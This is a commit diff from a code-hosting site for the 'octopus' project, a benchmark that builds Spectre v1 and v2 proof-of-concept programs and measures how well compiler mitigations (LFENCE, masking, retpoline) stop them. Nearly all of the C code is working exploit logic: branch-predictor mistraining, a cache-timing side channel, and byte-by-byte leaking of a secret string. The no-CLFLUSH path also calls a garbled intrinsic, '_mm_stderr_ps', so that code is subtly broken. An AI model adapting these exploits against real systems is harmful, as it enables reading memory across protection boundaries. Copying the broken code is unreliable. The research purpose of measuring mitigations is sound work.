sk4nz/octopus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Final touch: style and tabulations.

Browse Source
This commit is contained in:
Samuel Aubertin 2022-01-28 16:33:17 +01:00
parent 64f0c6b318
commit 47946f6aed
4 changed files with 400 additions and 614 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Makefile
View File

@ -34,11 +34,11 @@ LDFLAGS= -fuse-ld=lld
CCS= clang gcc CCS= clang gcc
OPTIMIZATIONS= 0 1 2 3 fast s OPTIMIZATIONS= 0 1 2 3 fast s
RETPOLINE= mretpoline RETPOLINE= mretpoline
UUID:= $(shell uuid) UUID:= $(shell uuid || uuidgen)
RESULTS_FILE:= results-$(UUID).json RESULTS_FILE:= results-$(UUID).json
SSH_KEY= octoupload SSH_KEY= octoupload
TIMES= 3 TIMES= 3
FLAGS= -j OCTOFLAGS= -j
### Octopus internals ### Octopus internals
CPU:= $(shell LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}') CPU:= $(shell LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}')
@ -148,7 +148,7 @@ $(RESULTS_FILE): build
for p in $(PROGS); do \ for p in $(PROGS); do \
for t in $$(seq $(TIMES)); do \ for t in $$(seq $(TIMES)); do \
sleep 0.1; \ sleep 0.1; \
(taskset 01 ./$$p $(FLAGS) || printf "{ \"$$p\": false }")>> $@; \ (taskset 01 ./$$p $(OCTOFLAGS) || printf "{ \"$$p\": false }")>> $@; \
if ! [ "$$p" = "$(lastword $(PROGS))" ]; \ if ! [ "$$p" = "$(lastword $(PROGS))" ]; \
then echo ',' >> $@; \ then echo ',' >> $@; \
else if ! [ $$t -eq $(TIMES) ]; \ else if ! [ $$t -eq $(TIMES) ]; \

144
octopus.h Normal file
View File

@ -0,0 +1,144 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h>
#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#endif
#endif
#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
*
* array_index_mask_nospec() - generate a mask that is ~0UL when the
* bounds check succeeds and 0 otherwise
* @index: array element index
* @size: number of elements in array
*
* Returns:
* 0 - (index < size)
*/
static inline unsigned long
array_index_mask_nospec(unsigned long index, unsigned long size)
{
unsigned long mask;
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
:"=r" (mask)
:"g"(size),"r" (index)
:"cc");
return mask;
}
#endif //MASKING_MITIGATION
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void
flush_memory_sse(uint8_t * addr)
{
float* p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
static inline unsigned
timed_access(volatile uint8_t *addr)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk;
#ifndef NORDTSCP
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
/*
Since the rdstc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
t0 = __rdtsc();
_mm_mfence();
junk = *addr;
_mm_mfence();
t1 = __rdtsc();
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
return (unsigned)(t1 - t0 - LATENCY);
}
static void
calibrate_threshold(unsigned int *threshold)
{
volatile char buf[2 * CACHELINE_SIZE];
volatile uint8_t* bufp;
int i;
const int cnt = 10000;
uint64_t tcache = 0;
__attribute__((unused))
volatile int junk = 0;
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) {
tcache += timed_access(bufp);
}
tcache = tcache / cnt;
if (threshold != NULL) {
*threshold = tcache + LATENCY;
}
return;
}

219
spectre_v1.c
View File

@ -19,177 +19,15 @@
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/ */
#include <stdio.h> #include "octopus.h"
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h> /* for rdtscp and clflush */
#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#endif
#endif
#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
*
* array_index_mask_nospec() - generate a mask that is ~0UL when the
* bounds check succeeds and 0 otherwise
* @index: array element index
* @size: number of elements in array
*
* Returns:
* 0 - (index < size)
*/
static inline unsigned long
array_index_mask_nospec(
unsigned long index,
unsigned long size
)
{
unsigned long mask;
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
:"=r" (mask)
:"g"(size),"r" (index)
:"cc");
return mask;
}
#endif //MASKING_MITIGATION
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void
flush_memory_sse(
uint8_t * addr
)
{
float * p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
unsigned int cache_hit_threshold, array1_size = 16;
uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */ uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
unsigned cache_hit_threshold;
static inline unsigned
timed_access(
volatile uint8_t *addr
)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk;
#ifndef NORDTSCP
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
/*
Since the rdstc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
t0 = __rdtsc();
_mm_mfence();
junk = * addr;
_mm_mfence();
t1 = __rdtsc();
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
return (unsigned)(t1 - t0 - LATENCY);
}
static void
calibrate_threshold(
unsigned int *threshold
)
{
volatile char buf[2 * CACHELINE_SIZE];
volatile uint8_t *bufp;
int i;
const int cnt = 10000;
uint64_t tcache = 0;
__attribute__((unused))
volatile int junk = 0;
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
~(CACHELINE_SIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) {
tcache += timed_access(bufp);
}
tcache = tcache / cnt;
if (threshold != NULL) {
*threshold = tcache + LATENCY;
}
return;
}
void void
victim_function( victim_function(size_t x)
size_t x
)
{ {
if (x < array1_size) { if (x < array1_size) {
#ifdef LFENCE_MITIGATION #ifdef LFENCE_MITIGATION
@ -205,21 +43,16 @@ victim_function(
#ifdef MASKING_MITIGATION #ifdef MASKING_MITIGATION
x &= array_index_mask_nospec(x, array1_size); x &= array_index_mask_nospec(x, array1_size);
#endif #endif
temp &= array2[array1[x] * 512]; temp &= array2[array1[x] * 512];
} }
} }
void void
leak( leak(size_t malicious_x, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
size_t malicious_x,
uint8_t value[2],
int score[2],
unsigned cache_hit_threshold
)
{ {
static int results[256]; static int results[256];
int tries, i, j, mix_i; int tries, i, j, mix_i, junk = 0;
unsigned int junk = 0;
size_t training_x, x; size_t training_x, x;
volatile uint8_t* addr; volatile uint8_t* addr;
@ -228,13 +61,10 @@ leak(
int l; int l;
(void)junk2; (void)junk2;
#endif #endif
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
results[i] = 0; results[i] = 0;
} }
for (tries = 999; tries > 0; tries--) { for (tries = 999; tries > 0; tries--) {
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
/* Flush array2[256*(0..255)] from cache */ /* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++) for (i = 0; i < 256; i++)
@ -248,7 +78,6 @@ leak(
} }
} }
#endif #endif
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size; training_x = tries % array1_size;
for (j = 29; j >= 0; j--) { for (j = 29; j >= 0; j--) {
@ -270,7 +99,6 @@ leak(
x = training_x ^ (x & (malicious_x ^ training_x)); x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */ /* Call the victim! */
victim_function(x); victim_function(x);
} }
/* Time reads. Order is lightly mixed up to prevent stride prediction */ /* Time reads. Order is lightly mixed up to prevent stride prediction */
@ -280,7 +108,6 @@ leak(
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */ results[mix_i]++; /* cache hit - add +1 to score for this value */
} }
/* Locate highest results in j */ /* Locate highest results in j */
j = -1; j = -1;
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
@ -291,24 +118,17 @@ leak(
if (results[j] >= 3) if (results[j] >= 3)
break; break;
} }
results[0] ^= junk; /* use junk so code above wont get optimized out*/ results[0] ^= junk; /* use junk so code above wont get optimized out*/
value[0] = (uint8_t) j; value[0] = (uint8_t) j;
score[0] = results[j]; score[0] = results[j];
} }
int int
main( main(int argc, char** argv)
int argc,
char** argv
)
{ {
int o;
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
int i, score[2], len = (int)strlen(secret); int i, o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
uint8_t value[2]; uint8_t value[2];
unsigned successes = 0;
int json = 0;
while ((o = getopt(argc, argv, "t:j")) != EOF) { while ((o = getopt(argc, argv, "t:j")) != EOF) {
switch (o) { switch (o) {
@ -327,24 +147,20 @@ main(
return 1; return 1;
} }
} }
if (argc != optind) if (argc != optind) {
goto usage; goto usage;
}
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", argv[0] + 2, (int)strlen(secret));
argv[0] + 2,
(int)strlen(secret));
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
#ifdef NOCLFLUSH #ifdef NOCLFLUSH
for (i = 0; i < (int)sizeof(cache_flush_array); i++) { for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
cache_flush_array[i] = 1; cache_flush_array[i] = 1;
} }
#endif #endif
for (i = 0; i < (int)sizeof(array2); i++) {
for (i = 0; i < (int)sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
}
while (--len >= 0) { while (--len >= 0) {
leak(malicious_x++, value, score, cache_hit_threshold); leak(malicious_x++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) { if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
@ -385,8 +201,7 @@ main(
#endif #endif
printf("}, "); printf("}, ");
printf("\"threshold\": %d, ", cache_hit_threshold); printf("\"threshold\": %d, ", cache_hit_threshold);
printf("\"success\": %.0f } }", printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
100 * successes / (float)strlen(secret));
} }
fprintf(stderr, "[+] %-27s\t",argv[0] + 2); fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
#ifndef NORDTSCP #ifndef NORDTSCP
@ -406,9 +221,7 @@ main(
#ifdef MASKING_MITIGATION #ifdef MASKING_MITIGATION
fprintf(stderr, "MASKING_MITIGATION "); fprintf(stderr, "MASKING_MITIGATION ");
#endif #endif
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
cache_hit_threshold,
100 * successes / (float)strlen(secret));
return 0; return 0;
} }

219
spectre_v2.c
View File

@ -18,83 +18,20 @@
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/ */
#include <stdio.h> #include "octopus.h"
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h> /* for rdtscp and clflush */
#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#ifndef NOMFENCE
#define LATENCY 18 + 18
#endif
#endif
#define GAP 1024 #define GAP 1024
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void
flush_memory_sse(
uint8_t * addr
)
{
float * p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
uint8_t channel[256 * GAP]; // side channel to extract secret phrase
uint64_t* target; // pointer to indirect call target uint64_t* target; // pointer to indirect call target
unsigned int cache_hit_threshold, array1_size = 16;
unsigned int array1_size = 16; uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */ uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
unsigned cache_hit_threshold; uint8_t channel[256 * GAP]; // side channel to extract secret phrase
// mistrained target of indirect call // mistrained target of indirect call
int int
gadget( gadget(char* addr)
char *addr
)
{ {
return channel[*addr * GAP]; // speculative loads fetch data into the cache return channel[*addr * GAP]; // speculative loads fetch data into the cache
} }
@ -106,89 +43,13 @@ safe_target()
return 42; return 42;
} }
static inline unsigned
timed_access(
volatile uint8_t *addr
)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk;
#ifndef NORDTSCP
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
/*
Since the rdstc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
t0 = __rdtsc();
_mm_mfence();
junk = * addr;
_mm_mfence();
t1 = __rdtsc();
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
return (unsigned)(t1 - t0 - LATENCY);
}
static void
calibrate_threshold(
unsigned int *threshold
)
{
volatile char buf[2 * CACHELINE_SIZE];
volatile uint8_t *bufp;
int i;
const int cnt = 10000;
uint64_t tcache = 0;
__attribute__((unused))
volatile int junk = 0;
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
~(CACHELINE_SIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) {
tcache += timed_access(bufp);
}
tcache = tcache / cnt;
if (threshold != NULL) {
*threshold = tcache + LATENCY;
}
return;
}
// function that makes indirect call // function that makes indirect call
// note that addr will be passed to gadget via %rdi // note that addr will be passed to gadget via %rdi
int int
victim_function( victim_function(char* addr, int input)
char *addr,
int input
)
{ {
#pragma GCC diagnostic ignored "-Wuninitialized" #pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk; unsigned int result, junk = junk;
// set up branch history buffer (bhb) by performing >29 taken branches // set up branch history buffer (bhb) by performing >29 taken branches
// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html // see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
// for details about how the branch prediction mechanism works // for details about how the branch prediction mechanism works
@ -197,8 +58,6 @@ victim_function(
input += i; input += i;
junk += input & i; junk += input & i;
} }
int result;
// call *target // call *target
__asm volatile("callq *%1\n" __asm volatile("callq *%1\n"
"mov %%eax, %0\n" "mov %%eax, %0\n"
@ -209,36 +68,27 @@ victim_function(
} }
static inline void static inline void
leak( leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
char *target_addr,
uint8_t value[2],
int score[2],
unsigned cache_hit_threshold
)
{ {
static int results[256]; static int results[256];
int tries, i, j, mix_i; int tries, i, j, mix_i;
unsigned int junk = 0; unsigned int junk = 0;
volatile uint8_t* addr; volatile uint8_t* addr;
char dummy = '@'; char dummy = '@';
#ifdef NOCLFLUSH #ifdef NOCLFLUSH
int junk2 = 0; int junk2 = 0;
int l; int l;
(void)junk2; (void)junk2;
#endif #endif
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
results[i] = 0; results[i] = 0;
channel[i * GAP] = 1; channel[i * GAP] = 1;
} }
for (tries = 999; tries > 0; tries--) { for (tries = 999; tries > 0; tries--) {
*target = (uint64_t)&gadget; *target = (uint64_t)&gadget;
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
for (j = 50; j > 0; j--) { for (j = 50; j > 0; j--) {
junk ^= victim_function(&dummy, 0); junk ^= victim_function(&dummy, 0);
} }
@ -248,8 +98,9 @@ leak(
#endif #endif
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
for (i = 0; i < 256; i++) for (i = 0; i < 256; i++) {
_mm_clflush(&channel[i * GAP]); _mm_clflush(&channel[i * GAP]);
}
#else #else
for (j = 0; j < 16; j++) { for (j = 0; j < 16; j++) {
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
@ -263,40 +114,34 @@ leak(
// change to safe target // change to safe target
*target = (uint64_t)&safe_target; *target = (uint64_t)&safe_target;
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
// flush target to prolong misprediction interval // flush target to prolong misprediction interval
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
_mm_clflush((void*) target); _mm_clflush((void*) target);
#else #else
flush_memory_sse((void*) target);
#endif #endif
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
// call victim // call victim
junk ^= victim_function(target_addr, 0); junk ^= victim_function(target_addr, 0);
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
// now, the value of *addr_to_read should be cached even though // now, the value of *addr_to_read should be cached even though
// the logical execution path never calls gadget() // the logical execution path never calls gadget()
// time reads, mix up order to prevent stride prediction
/* Time reads. Order is lightly mixed up to prevent stride prediction */ /* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255; mix_i = ((i * 167) + 13) & 255;
addr = & channel[mix_i * GAP]; addr = & channel[mix_i * GAP];
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {
results[mix_i]++; /* cache hit - add +1 to score for this value */ results[mix_i]++; /* cache hit - add +1 to score for this value */
} }
}
/* Locate highest results in j */ /* Locate highest results in j */
j = -1; j = -1;
for (i = 0; i < 256; i++) { for (i = 0; i < 256; i++) {
@ -304,28 +149,20 @@ leak(
j = i; j = i;
} }
} }
if (results[j] >= 3) if (results[j] >= 3) {
break; break;
} }
}
results[0] ^= junk; /* use junk so code above wont get optimized out*/ results[0] ^= junk; /* use junk so code above wont get optimized out*/
value[0] = (uint8_t) j; value[0] = (uint8_t) j;
score[0] = results[j]; score[0] = results[j];
} }
int int
main( main(int argc, char** argv)
int argc,
char** argv
)
{ {
target = (uint64_t*)malloc(sizeof(uint64_t)); int o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
int o;
//size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
int score[2], len = (int)strlen(secret);
uint8_t value[2]; uint8_t value[2];
unsigned successes = 0;
int json = 0;
char* addr = secret; char* addr = secret;
while ((o = getopt(argc, argv, "t:j")) != EOF) { while ((o = getopt(argc, argv, "t:j")) != EOF) {
@ -345,23 +182,18 @@ main(
return 1; return 1;
} }
} }
if (argc != optind) if (argc != optind) {
goto usage; goto usage;
}
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", target = (uint64_t*)malloc(sizeof(uint64_t));
argv[0] + 2, fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len);
len);
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
#ifdef NOCLFLUSH #ifdef NOCLFLUSH
for (i = 0; i < (int)sizeof(cache_flush_array); i++) { for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
cache_flush_array[i] = 1; cache_flush_array[i] = 1;
} }
#endif #endif
//for (i = 0; i < (int)sizeof(array2); i++)
// array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
while (--len >= 0) { while (--len >= 0) {
leak(addr++, value, score, cache_hit_threshold); leak(addr++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) { if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
@ -391,8 +223,7 @@ main(
#endif #endif
printf("}, "); printf("}, ");
printf("\"threshold\": %d, ", cache_hit_threshold); printf("\"threshold\": %d, ", cache_hit_threshold);
printf("\"success\": %.0f } }", printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
100 * successes / (float)strlen(secret));
} }
fprintf(stderr, "[+] %-27s\t",argv[0] + 2); fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
#ifndef NORDTSCP #ifndef NORDTSCP
@ -406,9 +237,7 @@ main(
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
fprintf(stderr, "CLFLUSH "); fprintf(stderr, "CLFLUSH ");
#endif #endif
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
cache_hit_threshold,
100 * successes / (float)strlen(secret));
free(target); free(target);
return 0; return 0;
} }